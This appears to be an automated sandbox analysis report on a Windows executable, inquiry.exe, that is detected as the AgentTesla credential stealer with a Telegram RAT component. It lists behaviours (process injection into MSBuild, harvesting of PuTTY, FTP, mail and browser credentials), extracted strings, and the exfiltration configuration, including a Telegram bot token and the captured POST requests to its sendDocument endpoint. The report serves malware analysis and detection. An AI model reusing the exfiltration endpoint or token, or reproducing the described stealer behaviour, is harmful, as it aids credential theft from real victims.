Play interactive tour

Edit tour

Windows Analysis Report inquiry.exe

Overview

General Information

Sample Name:	inquiry.exe
Analysis ID:	483914
MD5:	e15248f30c0657187fbb03e46430f97a
SHA1:	42b284897791f02b6b076acf13f406ffd5a4b19a
SHA256:	9f2dc372685655a102ba02d121745b124d47ea7b90d0f697181fda747a26ae2e
Tags:	agentteslaexe
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected AgentTesla

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

inquiry.exe (PID: 4388 cmdline: 'C:\Users\user\Desktop\inquiry.exe' MD5: E15248F30C0657187FBB03E46430F97A)

conhost.exe (PID: 2576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\inquiry.exe' MD5: D621FD77BD585874F9686D3A76462EF1)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1717121719", "Chat URL": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: inquiry.exe PID: 4388	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 6336	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 6336	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 6336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.inquiry.exe.ea0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.inquiry.exe.ea0000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.inquiry.exe.ea0000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.inquiry.exe.ea0000.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.inquiry.exe.ea0000.1.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1717121719", "Chat URL": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument"}
Source: inquiry.exe.4388.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendMessage"}

Multi AV Scanner detection for submitted file

Show sources

Source: inquiry.exe	Virustotal: Detection: 47%			Perma Link
Source: inquiry.exe	ReversingLabs: Detection: 64%

Source: 2.2.MSBuild.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: inquiry.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49815 version: TLS 1.2

Source: inquiry.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997Host: api.telegram.orgContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9788283298e0eHost: api.telegram.orgContent-Length: 1900Expect: 100-continue

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815

Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: MSBuild.exe, 00000002.00000002.619340495.00000000060A2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: http://tyHOrV.com
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%$
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	String found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/
Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocumentdocument-----
Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org4sn
Source: MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD8sn
Source: MSBuild.exe, 00000002.00000002.617344247.000000000328B000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.617328263.0000000003287000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: https://oLurbWzWRU.org
Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

HTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997Host: api.telegram.orgContent-Length: 1012Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49815 version: TLS 1.2

Source: inquiry.exe, 00000000.00000002.353187849.0000000000F9A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: inquiry.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D42FE9	0_2_00D42FE9
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D49092	0_2_00D49092
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D4A871	0_2_00D4A871
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D49604	0_2_00D49604
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D4B83D	0_2_00D4B83D
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D4797C	0_2_00D4797C
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D48B20	0_2_00D48B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01060D70	2_2_01060D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01069400	2_2_01069400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01064040	2_2_01064040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0106F2B8	2_2_0106F2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01066AF0	2_2_01066AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01062718	2_2_01062718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01067BF8	2_2_01067BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01452F58	2_2_01452F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0145AFE8	2_2_0145AFE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01458640	2_2_01458640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_014562D0	2_2_014562D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01450A40	2_2_01450A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0145EA4A	2_2_0145EA4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_014647A0	2_2_014647A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01465471	2_2_01465471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_01463CCC	2_2_01463CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_014646B0	2_2_014646B0

Source: inquiry.exe, 00000000.00000003.350221734.0000000002946000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs inquiry.exe
Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWvsmxvqOErTYqqafvSLdXBGos.exe4 vs inquiry.exe

Source: inquiry.exe	Virustotal: Detection: 47%
Source: inquiry.exe	ReversingLabs: Detection: 64%

Source: inquiry.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\inquiry.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\inquiry.exe 'C:\Users\user\Desktop\inquiry.exe'
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\dj2qhmgg.ty5

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/1@2/1

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00D41450

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00D41450

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2576:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: inquiry.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: inquiry.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: inquiry.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp

Source: inquiry.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: inquiry.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: inquiry.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: inquiry.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: inquiry.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D43BA5 push ecx; ret

0_2_00D43BB8

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00D41450

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D42FE9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D42FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

